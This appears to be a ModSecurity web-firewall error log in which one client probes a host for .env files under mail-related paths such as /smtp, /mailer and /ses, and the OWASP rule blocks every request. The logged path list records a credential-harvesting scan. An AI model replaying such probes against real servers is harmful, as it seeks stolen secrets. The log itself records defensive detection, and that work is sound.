[Mon May 11 16:41:56.276146 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/logs/.env"] [unique_id "agHqtFV4kyjgo4bQBUhawgAAAMg"]
[Mon May 11 16:41:56.276658 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/logs/.env"] [unique_id "agHqtFV4kyjgo4bQBUhawgAAAMg"]
[Mon May 11 16:41:56.276895 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/logs/.env"] [unique_id "agHqtFV4kyjgo4bQBUhawgAAAMg"]
[Mon May 11 16:41:56.445778 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cache/.env"] [unique_id "agHqtFV4kyjgo4bQBUhawwAAAMg"]
[Mon May 11 16:41:56.446271 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cache/.env"] [unique_id "agHqtFV4kyjgo4bQBUhawwAAAMg"]
[Mon May 11 16:41:56.446502 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cache/.env"] [unique_id "agHqtFV4kyjgo4bQBUhawwAAAMg"]
[Mon May 11 16:41:56.608445 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mailer/.env"] [unique_id "agHqtFV4kyjgo4bQBUhaxAAAAMg"]
[Mon May 11 16:41:56.608915 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mailer/.env"] [unique_id "agHqtFV4kyjgo4bQBUhaxAAAAMg"]
[Mon May 11 16:41:56.609145 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mailer/.env"] [unique_id "agHqtFV4kyjgo4bQBUhaxAAAAMg"]
[Mon May 11 16:41:56.771373 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mail/.env"] [unique_id "agHqtFV4kyjgo4bQBUhaxgAAAMg"]
[Mon May 11 16:41:56.771877 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mail/.env"] [unique_id "agHqtFV4kyjgo4bQBUhaxgAAAMg"]
[Mon May 11 16:41:56.772117 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mail/.env"] [unique_id "agHqtFV4kyjgo4bQBUhaxgAAAMg"]
[Mon May 11 16:41:56.940830 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/email/.env"] [unique_id "agHqtFV4kyjgo4bQBUhaxwAAAMg"]
[Mon May 11 16:41:56.941321 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/email/.env"] [unique_id "agHqtFV4kyjgo4bQBUhaxwAAAMg"]
[Mon May 11 16:41:56.941560 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/email/.env"] [unique_id "agHqtFV4kyjgo4bQBUhaxwAAAMg"]
[Mon May 11 16:41:57.103861 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/smtp/.env"] [unique_id "agHqtVV4kyjgo4bQBUhayAAAAMg"]
[Mon May 11 16:41:57.104350 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/smtp/.env"] [unique_id "agHqtVV4kyjgo4bQBUhayAAAAMg"]
[Mon May 11 16:41:57.104581 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/smtp/.env"] [unique_id "agHqtVV4kyjgo4bQBUhayAAAAMg"]
[Mon May 11 16:41:57.271749 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mailing/.env"] [unique_id "agHqtVV4kyjgo4bQBUhayQAAAMg"]
[Mon May 11 16:41:57.272253 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mailing/.env"] [unique_id "agHqtVV4kyjgo4bQBUhayQAAAMg"]
[Mon May 11 16:41:57.272483 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mailing/.env"] [unique_id "agHqtVV4kyjgo4bQBUhayQAAAMg"]
[Mon May 11 16:41:57.455677 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/notifications/.env"] [unique_id "agHqtVV4kyjgo4bQBUhaywAAAMg"]
[Mon May 11 16:41:57.456209 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/notifications/.env"] [unique_id "agHqtVV4kyjgo4bQBUhaywAAAMg"]
[Mon May 11 16:41:57.456488 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/notifications/.env"] [unique_id "agHqtVV4kyjgo4bQBUhaywAAAMg"]
[Mon May 11 16:41:57.618914 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/notify/.env"] [unique_id "agHqtVV4kyjgo4bQBUhazAAAAMg"]
[Mon May 11 16:41:57.619420 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/notify/.env"] [unique_id "agHqtVV4kyjgo4bQBUhazAAAAMg"]
[Mon May 11 16:41:57.619659 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/notify/.env"] [unique_id "agHqtVV4kyjgo4bQBUhazAAAAMg"]
[Mon May 11 16:41:57.780511 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sender/.env"] [unique_id "agHqtVV4kyjgo4bQBUhazQAAAMg"]
[Mon May 11 16:41:57.781015 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sender/.env"] [unique_id "agHqtVV4kyjgo4bQBUhazQAAAMg"]
[Mon May 11 16:41:57.781259 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sender/.env"] [unique_id "agHqtVV4kyjgo4bQBUhazQAAAMg"]
[Mon May 11 16:41:57.943733 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/campaign/.env"] [unique_id "agHqtVV4kyjgo4bQBUhazwAAAMg"]
[Mon May 11 16:41:57.944221 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/campaign/.env"] [unique_id "agHqtVV4kyjgo4bQBUhazwAAAMg"]
[Mon May 11 16:41:57.944465 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/campaign/.env"] [unique_id "agHqtVV4kyjgo4bQBUhazwAAAMg"]
[Mon May 11 16:41:58.107416 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/newsletter/.env"] [unique_id "agHqtlV4kyjgo4bQBUha0AAAAMg"]
[Mon May 11 16:41:58.107909 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/newsletter/.env"] [unique_id "agHqtlV4kyjgo4bQBUha0AAAAMg"]
[Mon May 11 16:41:58.108151 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/newsletter/.env"] [unique_id "agHqtlV4kyjgo4bQBUha0AAAAMg"]
[Mon May 11 16:41:58.283536 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/ses/.env"] [unique_id "agHqtlV4kyjgo4bQBUha0QAAAMg"]
[Mon May 11 16:41:58.284035 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/ses/.env"] [unique_id "agHqtlV4kyjgo4bQBUha0QAAAMg"]
[Mon May 11 16:41:58.284272 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/ses/.env"] [unique_id "agHqtlV4kyjgo4bQBUha0QAAAMg"]
